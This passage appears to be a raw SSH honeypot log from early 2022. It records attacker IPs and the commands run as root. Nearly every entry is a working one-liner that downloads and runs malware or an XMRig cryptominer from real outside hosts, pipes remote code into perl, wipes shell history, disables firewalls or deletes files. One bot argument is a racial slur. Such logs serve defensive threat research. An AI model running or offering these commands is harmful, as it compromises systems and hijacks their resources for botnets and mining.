179.43.175.83/x86_64; chmod 777 x86_64; ./x86_64 x86xhed cd /tmp/ wget 179.43.175.83/x86_64 chmod 777 x86_64 ./x86_64 x86xhed From 81.17.24.154 16-Feb-2022 14:54:43 ssh2 root Exec wget 141.98.10.171/x86; chmod 777 x86; ./x86 nigga wget 141.98.10.171/x86 chmod 777 x86 ./x86 nigga From 179.43.159.4 18-Feb-2022 23:12:10 ssh2 root Exec cd /tmp/; rm -rf x86*; wget 179.43.175.83/x86_64; chmod 777 x86_64; ./x86_64 x86xhed cd /tmp/ rm -rf x86* wget 179.43.175.83/x86_64 chmod 777 x86_64 ./x86_64 x86xhed From 62.233.50.127 20-Feb-2022 11:52:18 ssh2 root Exec unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH ; history -n ; export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0; unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH history -n export HISTFILE=/dev/null export HISTSIZE=0 export HISTFILESIZE=0 From 179.43.168.126 22-Feb-2022 03:02:30 ssh2 root Exec uname -a; cd /tmp; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; wget http://179.43.175.170/putkite/quickr1n.sh; curl -O http://179.43.175.170/putkite/quickr1n.sh; chmod 777 *; sh quickr1n.sh; echo storytimeDedicated uname -a cd /tmp curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA wget http://179.43.175.170/putkite/quickr1n.sh curl -O http://179.43.175.170/putkite/quickr1n.sh chmod 777 * sh quickr1n.sh echo storytimeDedicated From 36.92.125.163 22-Feb-2022 06:17:06 ssh2 root Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec cat /proc/cpuinfo | grep name | wc -l cat /proc/cpuinfo | grep name | wc -l From 183.77.156.89 22-Feb-2022 06:41:26 ssh2 root Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig From 139.209.222.134 22-Feb-2022 06:42:56 ssh2 root Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig From 42.194.138.246 22-Feb-2022 06:43:37 ssh2 root Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec cat /proc/cpuinfo | grep name | wc -l cat /proc/cpuinfo | grep name | wc -l Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig From 121.200.53.148 22-Feb-2022 06:45:47 ssh2 root Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 110.42.236.48 22-Feb-2022 07:06:04 ssh2 root Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig From 8.17.89.11 22-Feb-2022 07:08:27 ssh2 root Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig From 196.221.203.98 22-Feb-2022 07:13:34 ssh2 root Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 173.82.48.12 22-Feb-2022 13:00:53 ssh2 root Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig From 183.77.156.89 22-Feb-2022 13:04:12 ssh2 root Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig From 112.46.68.25 22-Feb-2022 15:02:07 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig From 182.139.135.66 22-Feb-2022 15:10:30 ssh2 root Exec echo -n stjrd1hy|md5sum;uname -a echo -n stjrd1hy|md5sum uname -a From 101.43.101.163 22-Feb-2022 15:27:36 ssh2 root Exec cat /proc/cpuinfo | grep name | wc -l cat /proc/cpuinfo | grep name | wc -l Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 161.35.116.146 22-Feb-2022 19:51:08 ssh2 root Exec cat /proc/cpuinfo | grep name | cut -f2 -d: | uniq -c; nvidia-smi --list-gpus | grep 0 | cut -f2 -d: | uniq -c;curl -s 185.244.149.237/.cache|perl;wget -qO - 185.244.149.237/.cache|perl cat /proc/cpuinfo | grep name | cut -f2 -d: | uniq -c nvidia-smi --list-gpus | grep 0 | cut -f2 -d: | uniq -c curl -s 185.244.149.237/.cache|perl wget -qO - 185.244.149.237/.cache|perl From 104.248.82.49 23-Feb-2022 16:27:02 ssh2 root Exec cat /proc/cpuinfo | grep name | cut -f2 -d: | uniq -c; nvidia-smi --list-gpus | grep 0 | cut -f2 -d: | uniq -c cat /proc/cpuinfo | grep name | cut -f2 -d: | uniq -c nvidia-smi --list-gpus | grep 0 | cut -f2 -d: | uniq -c From 179.43.168.126 23-Feb-2022 19:12:36 ssh2 root Exec uname -a; cd /tmp; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; wget http://179.43.175.170/putkite/quickr1n.sh; curl -O http://179.43.175.170/putkite/quickr1n.sh; chmod 777 *; sh quickr1n.sh; echo storytimeDedicated uname -a cd /tmp curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA wget http://179.43.175.170/putkite/quickr1n.sh curl -O http://179.43.175.170/putkite/quickr1n.sh chmod 777 * sh quickr1n.sh echo storytimeDedicated From 46.97.177.23 23-Feb-2022 20:03:31 ssh2 root w uname -a cat /etc/issue ifconfig cat /proc/cpuinfo cd /root ls -a ls -a cd /root ls ls -a cd .ssh ls -a ls cd .ssh ls ls -a yum update -y apt-get update -y cd /dev/shm ls -a wget http://soho.altervista.org/asssja/goshs1.zip wget http://soho.altervista.org/asssja/goshs1.zip cd /tmp wget http://soho.altervista.org/asssja/goshs1.zip cd /root ls cd OpenOffice.org1.0 ls -a ll ps x /usr/bin/startx cd /var/www/ s ls cd /var/www/html s -as ls -as w uname -a id cat /etc/passwd From 199.195.251.203 27-Feb-2022 01:46:43 ssh2 root Exec cd /tmp || cd /var/tmp || cd /dev/shm || cd /mnt || cd /root;curl -o linux_386 http://164.92.207.64:9669/linux_386 || wget http://164.92.207.64:9669/linux_386;curl -o linux_arm http://164.92.207.64:9669/linux_arm || wget http://164.92.207.64:9669/linux_arm;curl -o linux_arm64 http://164.92.207.64:9669/linux_arm64 || wget http://164.92.207.64:9669/linux_arm64;curl -o linux_mips http://164.92.207.64:9669/linux_mips || wget http://164.92.207.64:9669/linux_mips;curl -o linux_mips64 http://164.92.207.64:9669/linux_mips64 || wget http://164.92.207.64:9669/linux_mips64;curl -o linux_x86_64 http://164.92.207.64:9669/linux_x86_64 || wget http://164.92.207.64:9669/linux_x86_64;chmod +x *; ./linux_386; ./linux_arm; ./linux_arm64; ./linux_mips; ./linux_mips64; ./linux_x86_64; cd /tmp || cd /var/tmp || cd /dev/shm || cd /mnt || cd /root curl -o linux_386 http://164.92.207.64:9669/linux_386 || wget http://164.92.207.64:9669/linux_386 curl -o linux_arm http://164.92.207.64:9669/linux_arm || wget http://164.92.207.64:9669/linux_arm curl -o linux_arm64 http://164.92.207.64:9669/linux_arm64 || wget http://164.92.207.64:9669/linux_arm64 curl -o linux_mips http://164.92.207.64:9669/linux_mips || wget http://164.92.207.64:9669/linux_mips curl -o linux_mips64 http://164.92.207.64:9669/linux_mips64 || wget http://164.92.207.64:9669/linux_mips64 curl -o linux_x86_64 http://164.92.207.64:9669/linux_x86_64 || wget http://164.92.207.64:9669/linux_x86_64 chmod +x * ./linux_386 ./linux_arm ./linux_arm64 ./linux_mips ./linux_mips64 ./linux_x86_64 Exec cd /tmp || cd /var/tmp || cd /dev/shm || cd /mnt || cd /root;curl -o linux_386 http://164.92.207.64:9669/linux_386 || wget http://164.92.207.64:9669/linux_386;curl -o linux_arm http://164.92.207.64:9669/linux_arm || wget http://164.92.207.64:9669/linux_arm;curl -o linux_arm64 http://164.92.207.64:9669/linux_arm64 || wget http://164.92.207.64:9669/linux_arm64;curl -o linux_mips http://164.92.207.64:9669/linux_mips || wget http://164.92.207.64:9669/linux_mips;curl -o linux_mips64 http://164.92.207.64:9669/linux_mips64 || wget http://164.92.207.64:9669/linux_mips64;curl -o linux_x86_64 http://164.92.207.64:9669/linux_x86_64 || wget http://164.92.207.64:9669/linux_x86_64;chmod +x *; ./linux_386; ./linux_arm; ./linux_arm64; ./linux_mips; ./linux_mips64; ./linux_x86_64; cd /tmp || cd /var/tmp || cd /dev/shm || cd /mnt || cd /root curl -o linux_386 http://164.92.207.64:9669/linux_386 || wget http://164.92.207.64:9669/linux_386 curl -o linux_arm http://164.92.207.64:9669/linux_arm || wget http://164.92.207.64:9669/linux_arm curl -o linux_arm64 http://164.92.207.64:9669/linux_arm64 || wget http://164.92.207.64:9669/linux_arm64 curl -o linux_mips http://164.92.207.64:9669/linux_mips || wget http://164.92.207.64:9669/linux_mips curl -o linux_mips64 http://164.92.207.64:9669/linux_mips64 || wget http://164.92.207.64:9669/linux_mips64 curl -o linux_x86_64 http://164.92.207.64:9669/linux_x86_64 || wget http://164.92.207.64:9669/linux_x86_64 chmod +x * ./linux_386 ./linux_arm ./linux_arm64 ./linux_mips ./linux_mips64 ./linux_x86_64 From 139.59.21.115 27-Feb-2022 22:35:40 ssh2 root Exec uname -a ; nproc uname -a nproc From 89.253.253.224 1-Mar-2022 07:11:53 ssh2 root Exec cat /proc/cpuinfo | grep name | wc -l cat /proc/cpuinfo | grep name | wc -l Exec cat /proc/cpuinfo | grep name | wc -l cat /proc/cpuinfo | grep name | wc -l From 115.146.182.160 4-Mar-2022 10:22:41 ssh2 root Exec nproc; uname -a nproc uname -a From 179.43.175.170 4-Mar-2022 12:51:38 ssh2 root Exec cd /tmp; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; wget http://179.43.175.170/putkite/quickr1n.sh; curl -O http://179.43.175.170/putkite/quickr1n.sh; chmod 777 *; sh quickr1n.sh; echo storytime cd /tmp curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA wget http://179.43.175.170/putkite/quickr1n.sh curl -O http://179.43.175.170/putkite/quickr1n.sh chmod 777 * sh quickr1n.sh echo storytime From 179.43.175.170 5-Mar-2022 10:02:13 ssh2 root Exec cd /tmp; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; wget http://179.43.175.170/putkite/quickr1n.sh; curl -O http://179.43.175.170/putkite/quickr1n.sh; chmod 777 *; sh quickr1n.sh; echo storytime cd /tmp curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA wget http://179.43.175.170/putkite/quickr1n.sh curl -O http://179.43.175.170/putkite/quickr1n.sh chmod 777 * sh quickr1n.sh echo storytime From 185.245.62.231 7-Mar-2022 04:49:57 ssh2 root Exec cd /etc/; wget http://185.245.62.231/test.sh; chmod 777 test.sh; ./test.sh; cd /etc/ wget http://185.245.62.231/test.sh chmod 777 test.sh ./test.sh From 107.189.7.13 7-Mar-2022 12:45:17 ssh2 root Exec payload payload From 20.73.164.164 11-Mar-2022 00:26:52 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.31.98.122/keenzeuonions; curl -O http://194.31.98.122/keenzeuonions; chmod 777 keenzeuonions; sh keenzeuonions; tftp 194.31.98.122 -c get keenzeuonions; chmod 777 bins.sh; sh keenzeuonions; tftp -r .sh -g 194.31.98.122; chmod 777 .keenzeuonions; sh .keenzeuonions; ftpget -v -u anonymous -p anonymous -P 21 194.31.98.122 .keenzeuonions .keenzeuonions; sh .keenzeuonions; rm -rf sh keenzeuonions .keenzeuonions .keenzeuonions; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://194.31.98.122/keenzeuonions curl -O http://194.31.98.122/keenzeuonions chmod 777 keenzeuonions sh keenzeuonions tftp 194.31.98.122 -c get keenzeuonions chmod 777 bins.sh sh keenzeuonions tftp -r .sh -g 194.31.98.122 chmod 777 .keenzeuonions sh .keenzeuonions ftpget -v -u anonymous -p anonymous -P 21 194.31.98.122 .keenzeuonions .keenzeuonions sh .keenzeuonions rm -rf sh keenzeuonions .keenzeuonions .keenzeuonions rm -rf * From 20.73.164.164 11-Mar-2022 11:26:27 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.31.98.122/keenzeuonions; curl -O http://194.31.98.122/keenzeuonions; chmod 777 keenzeuonions; sh keenzeuonions; tftp 194.31.98.122 -c get keenzeuonions; chmod 777 bins.sh; sh keenzeuonions; tftp -r .sh -g 194.31.98.122; chmod 777 .keenzeuonions; sh .keenzeuonions; ftpget -v -u anonymous -p anonymous -P 21 194.31.98.122 .keenzeuonions .keenzeuonions; sh .keenzeuonions; rm -rf sh keenzeuonions .keenzeuonions .keenzeuonions; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://194.31.98.122/keenzeuonions curl -O http://194.31.98.122/keenzeuonions chmod 777 keenzeuonions sh keenzeuonions tftp 194.31.98.122 -c get keenzeuonions chmod 777 bins.sh sh keenzeuonions tftp -r .sh -g 194.31.98.122 chmod 777 .keenzeuonions sh .keenzeuonions ftpget -v -u anonymous -p anonymous -P 21 194.31.98.122 .keenzeuonions .keenzeuonions sh .keenzeuonions rm -rf sh keenzeuonions .keenzeuonions .keenzeuonions rm -rf * From 20.205.100.164 13-Mar-2022 22:36:17 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.161.105/onions1337; curl -O http://45.90.161.105/onions1337; chmod 777 onions1337; sh onions1337; tftp 45.90.161.105 -c get bins.sh; chmod 777 onions1337; sh onions1337; tftp -r .sh -g 45.90.161.105; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 45.90.161.105 .sh .sh; sh .sh; rm -rf sh onions1337 .sh .sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://45.90.161.105/onions1337 curl -O http://45.90.161.105/onions1337 chmod 777 onions1337 sh onions1337 tftp 45.90.161.105 -c get bins.sh chmod 777 onions1337 sh onions1337 tftp -r .sh -g 45.90.161.105 chmod 777 .sh sh .sh ftpget -v -u anonymous -p anonymous -P 21 45.90.161.105 .sh .sh sh .sh rm -rf sh onions1337 .sh .sh rm -rf * Exec echo -e "\x6F\x6B" echo -e "\x6F\x6B" From 20.200.215.186 14-Mar-2022 02:27:56 ssh2 root Exec echo -e "\x6F\x6B" echo -e "\x6F\x6B" Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.161.105/onions1337; curl -O http://45.90.161.105/onions1337; chmod 777 onions1337; sh onions1337; tftp 45.90.161.105 -c get bins.sh; chmod 777 onions1337; sh onions1337; tftp -r .sh -g 45.90.161.105; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 45.90.161.105 .sh .sh; sh .sh; rm -rf sh onions1337 .sh .sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://45.90.161.105/onions1337 curl -O http://45.90.161.105/onions1337 chmod 777 onions1337 sh onions1337 tftp 45.90.161.105 -c get bins.sh chmod 777 onions1337 sh onions1337 tftp -r .sh -g 45.90.161.105 chmod 777 .sh sh .sh ftpget -v -u anonymous -p anonymous -P 21 45.90.161.105 .sh .sh sh .sh rm -rf sh onions1337 .sh .sh rm -rf * From 118.123.241.53 14-Mar-2022 03:14:06 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://118.123.241.53:2365/64linux;chmod 777 64linux;./64linux; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://118.123.241.53:2365/64linux chmod 777 64linux ./64linux From 118.123.241.53 14-Mar-2022 03:28:30 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://118.123.241.53:2365/config.json;wget -c http://118.123.241.53:2365/xmrig;chmod 777 xmrig;./xmrig; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://118.123.241.53:2365/config.json wget -c http://118.123.241.53:2365/xmrig chmod 777 xmrig ./xmrig From 111.229.197.140 15-Mar-2022 05:29:32 ssh2 root Exec cat /proc/cpuinfo | grep name | wc -l cat /proc/cpuinfo | grep name | wc -l Exec echo -e "\x6F\x6B" echo -e "\x6F\x6B" From 1.220.98.197 17-Mar-2022 19:29:22 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.161.105/onions1337; curl -O http://45.90.161.105/onions1337; chmod 777 onions1337; sh onions1337; tftp 45.90.161.105 -c get bins.sh; chmod 777 onions1337; sh onions1337; tftp -r .sh -g 45.90.161.105; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 45.90.161.105 .sh .sh; sh .sh; rm -rf sh onions1337 .sh .sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://45.90.161.105/onions1337 curl -O http://45.90.161.105/onions1337 chmod 777 onions1337 sh onions1337 tftp 45.90.161.105 -c get bins.sh chmod 777 onions1337 sh onions1337 tftp -r .sh -g 45.90.161.105 chmod 777 .sh sh .sh ftpget -v -u anonymous -p anonymous -P 21 45.90.161.105 .sh .sh sh .sh rm -rf sh onions1337 .sh .sh rm -rf * Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 159.223.232.102 19-Mar-2022 01:02:59 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://213.232.235.203/0x83911d24Fx.sh; curl -O http://213.232.235.203/0x83911d24Fx.sh; chmod 777 0x83911d24Fx.sh; sh 0x83911d24Fx.sh; tftp 157.230.119.179 -c get 0xt984767.sh; chmod 777 0xft6426467.sh; sh 0xft6426467.sh; tftp -r 0xtf2984767.sh -g 157.230.119.179 ; chmod 777 0xtf2984767.sh; sh 0xtf2984767.sh; ftpget -v -u anonymous -p anonymous -P 21 157.230.119.179 0xft6426467.sh 0xft6426467.sh; sh 0xft6426467.sh; rm -rf 0xt984767.sh 0xtf2984767.sh 0xft6426467.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://213.232.235.203/0x83911d24Fx.sh curl -O http://213.232.235.203/0x83911d24Fx.sh chmod 777 0x83911d24Fx.sh sh 0x83911d24Fx.sh tftp 157.230.119.179 -c get 0xt984767.sh chmod 777 0xft6426467.sh sh 0xft6426467.sh tftp -r 0xtf2984767.sh -g 157.230.119.179 chmod 777 0xtf2984767.sh sh 0xtf2984767.sh ftpget -v -u anonymous -p anonymous -P 21 157.230.119.179 0xft6426467.sh 0xft6426467.sh sh 0xft6426467.sh rm -rf 0xt984767.sh 0xtf2984767.sh 0xft6426467.sh rm -rf * From 2.56.59.96 19-Mar-2022 02:37:16 ssh2 root Exec wget 37.0.11.224/x86; chmod 777 x86; ./x86 nigga wget 37.0.11.224/x86 chmod 777 x86 ./x86 nigga From 179.43.168.126 21-Mar-2022 04:45:42 ssh2 root Exec cd /tmp; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; wget http://179.43.175.170/putkite/quickr1n.sh; chmod 777 *; sh quickr1n.sh; echo storytime cd /tmp curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA wget http://179.43.175.170/putkite/quickr1n.sh chmod 777 * sh quickr1n.sh echo storytime From 20.45.183.39 22-Mar-2022 00:41:34 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.161.105/onions1337; curl -O http://45.90.161.105/onions1337; chmod 777 onions1337; sh onions1337; tftp 45.90.161.105 -c get bins.sh; chmod 777 onions1337; sh onions1337; tftp -r .sh -g 45.90.161.105; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 45.90.161.105 .sh .sh; sh .sh; rm -rf sh onions1337 .sh .sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://45.90.161.105/onions1337 curl -O http://45.90.161.105/onions1337 chmod 777 onions1337 sh onions1337 tftp 45.90.161.105 -c get bins.sh chmod 777 onions1337 sh onions1337 tftp -r .sh -g 45.90.161.105 chmod 777 .sh sh .sh ftpget -v -u anonymous -p anonymous -P 21 45.90.161.105 .sh .sh sh .sh rm -rf sh onions1337 .sh .sh rm -rf * Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.161.105/onions1337; curl -O http://45.90.161.105/onions1337; chmod 777 onions1337; sh onions1337; tftp 45.90.161.105 -c get bins.sh; chmod 777 onions1337; sh onions1337; tftp -r .sh -g 45.90.161.105; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 45.90.161.105 .sh .sh; sh .sh; rm -rf sh onions1337 .sh .sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://45.90.161.105/onions1337 curl -O http://45.90.161.105/onions1337 chmod 777 